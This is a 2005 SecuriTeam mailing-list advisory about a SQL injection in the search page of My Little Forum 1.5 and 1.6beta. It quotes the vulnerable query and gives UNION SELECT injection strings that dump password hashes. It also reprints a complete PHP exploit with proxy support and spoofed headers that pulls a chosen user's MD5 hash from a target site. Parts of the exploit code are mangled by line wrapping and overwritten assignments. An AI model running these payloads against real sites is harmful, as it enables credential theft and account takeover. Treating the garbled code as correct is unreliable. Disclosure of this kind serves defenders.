[UNIX] My Little Forum SQL Injection

From: SecuriTeam (support_at_securiteam.com)
Date: 09/26/05

  • Next message: SecuriTeam: "[NEWS] MultiTheftAuto Privileges Escalation and DoS Vulnerabilities" 
    To: list@securiteam.com
Date: 26 Sep 2005 11:17:33 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      My Little Forum SQL Injection
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.mylittlehomepage.net/my_little_forum> my little forum - "A
    simple web-forum that supports classical thread view (message tree) as
    well as message board view to display the messages."

    My Little Forum vulnerable to SQL Injection.

    DETAILS

    Vulnerable Systems:
     * my little forum versions 1.5 and 1.6beta

    Vulnerable Code:
    From line 144 of search.php:
    ..
    $result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
    $time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
    DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR,
    '".$lang['time_format']."')
    AS Datum, subject, name, email, hp, place, text, category FROM
    ".$forum_table."
    WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
    $settings['search_results_per_page'], $connid);
    ..

    Now goto the search page, select "phrase", and type:
    [whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw,
    user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM
    forum_userdata where user_name='[username]' /*

    If magic quotes are off you will have any admin/user password hash 'cause
    $searchstring var is not filtered.

    Exploit:
    <?php
    # mlfexpl.php
        #
    #
        #
    # My Little Forum 1.5 ( possibly prior versions) SQL Injection /
        #
    # MD5 password hash disclosure poc exploit with proxy support
        #
    #
        #
    # by rgod
        #
    # site: http://rgod.altervista.org
        #
    #
        #
    # make these changes in php.ini if you have troubles
        #
    # to launch this script:
        #
    # allow_call_time_pass_reference = on
        #
    # register_globals = on
        #
    #
        #
    # usage: launch this script from Apache, fill requested fields, then...
        #
    # dump all password hashes from database right now...
        #
    #
        #
    # Sun-Tzu: "You can be sure of succeeding in your attacks if you only
    attack #
    # places which are undefended. You can ensure the safety of your defense
    if #
    # you only hold positions that cannot be attacked."
        #

    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout", 2);
    ob_implicit_flush (1);

    echo'<head><title>My Little Forum 1.5 SQL Injection </title><meta
    http-equiv="Co
    ntent-Type" content="text/html; charset=iso-8859-1"><style
    type="text/css"><!--
    body,td,th { color: #00FF00;} body { background-color: #000000;}
    Stile5 {
    font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px;}
    Stile6{
    font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold;
    font-sty
    le: italic; } --> </style></head> <body> <p class="Stile6"> My Little
    Forum 1
    5 SQL Injection </p><p class="Stile6">a script by rgod at <a href="http:
    //rgod
    altervista.org" target="_blank" > http://rgod.altervista.org </a>
    </p><table
    width="84%"><tr><td width="43%"> <form name="form1" method="post"
    action="'
    $SERVER[PHP_SELF].'?path=value&host=value&port=value&proxy=value&username=value
    "><p><input type="text" name="host"><span class="Stile5">hostname (ex:
    www.siten
    ame.com) </span></p><p><input type="text" name="path"> <span
    class="Stile5">
    path (ex: /mylf/ or just /) </span></p><p><input type="text" name="port"
    ><span
    class="Stile5"> specify a port other than 80 (default
    value)</span></p><p><input
    type="text" name="proxy"> <span class="Stile5"> send exploit through an
     HTTP
    proxy (ip:port) </span> </p> <p> <input type="text" name="username"> <span
    class
    -"Stile5">username whom you want MD5 hash </span> </p> <p> <input
    type="submit"
    name="Submit" value="go!"></p></form></td></tr></table></body>';

    function show($headeri)
    {
    $ii=0;
    $ji=0;
    $ki=0;
    $ci=0;
    echo '<table border="0"><tr>';
    while ($ii <= strlen($headeri)-1)
    {
    $datai=dechex(ord($headeri[$ii]));
    if ($ji==16) {
                 $ji=0;
                 $ci++;
                 echo "<td> </td>";
                 for ($li=0; $li<=15; $li++)
                          { echo "<td>".$headeri[$li+$ki]."</td>";
      }
                $ki=$ki+16;
                echo "</tr><tr>";
                }
    if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
    {echo "<td>".$datai."</td> ";}
    $ii++;
    $ji++;
    }
    for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                          { echo "<td>&nbsp&nbsp</td>";
                           }

    for ($li=$ci*16; $li<=strlen($headeri); $li++)
                          { echo "<td>".$headeri[$li]."</td>";
      }
    echo "</tr></table>";
    }

    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

    function sendpacket($packet,$show)
    {
    global $proxy, $host, $port, $html;
    if ($proxy=='')
               {$ock=fsockopen(gethostbyname($host),$port);}
                 else
               {
        if (!eregi($proxy_regex,$proxy))
        {echo htmlentities($proxy).' -> not a valid proxy...';
         die;
        }
       $parts=explode(':',$proxy);
        echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) { echo 'No response from proxy...';
      die;
      }
       }
    fputs($ock,$packet);
    if ($proxy=='')
      {

        $html='';
        while (!feof($ock))
          {
            $html.=fgets($ock);
          }
      }
    else
      {
        $html='';
        while ((!feof($ock)) or
    (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
        {
          $html.=fread($ock,1);
        }
      }
    fclose($ock);
    if ($show) {echo nl2br(htmlentities($html));}
    }

    if (($path<>'') and ($host<>'') and ($username<>''))
    {
      if ($port=='') {$port=80;}

    $sql="%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw,
    user_pw, user_pw, user_pw, user_pw, user_pw, user_pw";
    $sql=", user_pw"; //if version is 1.6 beta, just add a comment to ths line
    $sql=" FROM forum_userdata WHERE user_name='".$username."'/*";
    $sql=urlencode($sql);

    if ($proxy=='')
    {$packet="GET ".$path."search.php?search=".$sql."&ao=phrase
    HTTP/1.1\r\n";}
    else
    {$packet="GET http://".$host.$path."search.php?search=".$sql."&ao=phrase
    HTTP/1.1\r\n";}
    $packet.="Client-IP: 127.0.0.1\r\n";
    $packet.="X-Forwarded-For: 127.0.0.1\r\n";
    $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
    application/x-shockwave-flash, application/msword, */*\r\n";
    $packet.="Referer: http://".$host.$path."search.php\r\n";
    $packet.="Accept-Language: en\r\n";
    $packet.="Accept-Encoding: gzip, deflate\r\n";
    $packet.="User-Agent:
    Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Keep-Alive\r\n\r\n";
    show($packet);
    sendpacket($packet,0);
    $temp=explode(';<span class="category">(',$html);
    $temp2=explode(')</span>',$temp[1]);
    $hash=$temp2[0];

    echo '<br>username: '.$username.' hash: '.$hash;
    # debugging...
    //echo htmlentities($html);
    }
    else
    {
    echo '<br>fill in all requested fields, optionally specify a
    proxy...<br>';
    }
    ?>

    Version 1.6beta is vulnerable too:
    ..
    $result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL
    ".$time_difference." HOUR) AS
    Uhrzeit, subject, name, email, hp, place, text, category FROM
    ".$db_settings['forum_table']."
    WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.",
    ".$settings['search_results_per_page'],
    $connid);
    ..

    You will have same results, deleting a statement in injection string:

    [whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw,
    user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata
    where user_name='[username]' /*

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:retrogod@aliceposta it>
    rgod.
    The original article can be found at:
    <http://rgod.altervista.org/mylittle15_16b.html>
    http://rgod.altervista.org/mylittle15_16b.html

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] MultiTheftAuto Privileges Escalation and DoS Vulnerabilities"

    Relevant Pages